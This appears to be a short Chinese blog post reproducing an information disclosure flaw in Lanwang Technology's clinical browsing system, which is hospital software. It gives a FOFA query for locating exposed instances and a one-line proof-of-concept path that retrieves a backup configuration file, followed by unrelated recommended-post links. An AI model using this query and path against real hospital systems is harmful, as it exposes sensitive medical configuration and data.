【漏洞复现】蓝网科技临床浏览系统信息泄露漏洞

Nx01 产品简介

蓝网科技临床浏览系统是一个专门用于医疗行业的软件系统,主要用于医生、护士和其他医疗专业人员在临床工作中进行信息浏览、查询和管理。

Nx02 漏洞描述

蓝网科技临床浏览系统存在信息泄露漏洞,攻击者可以利用该漏洞获取敏感信息。

Nx03 产品主页

fofa-query: title=="临床浏览"

Nx04 漏洞复现

POC:

/config/config%20bak.txt

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
小歆88411 分钟前
100%全国产化时钟服务器、全国产化校时服务器、全国产化授时服务器
运维·服务器
大丈夫立于天地间17 分钟前
ISIS基础知识
网络·网络协议·学习·智能路由器·信息与通信
hgdlip19 分钟前
IP属地与视频定位位置不一致:现象解析与影响探讨
服务器·网络·tcp/ip
YesYoung!21 分钟前
pikachu靶场-敏感信息泄露概述
web安全·网络安全·ctf
doubt。25 分钟前
【BUUCTF】[RCTF2015]EasySQL1
网络·数据库·笔记·mysql·安全·web安全
0xfather44 分钟前
在Debian系统中安装Debian(Linux版PE装机)
linux·服务器·debian
Again_acme1 小时前
20250118面试鸭特训营第26天
服务器·面试·php
Jackson~Y2 小时前
Linux(LAMP)
linux·运维·服务器
廾匸07052 小时前
《2024年度网络安全漏洞威胁态势研究报告》
安全·web安全·网络安全·研究报告
不知 不知2 小时前
最新-CentOS 7安装1 Panel Linux 服务器运维管理面板
linux·运维·服务器·centos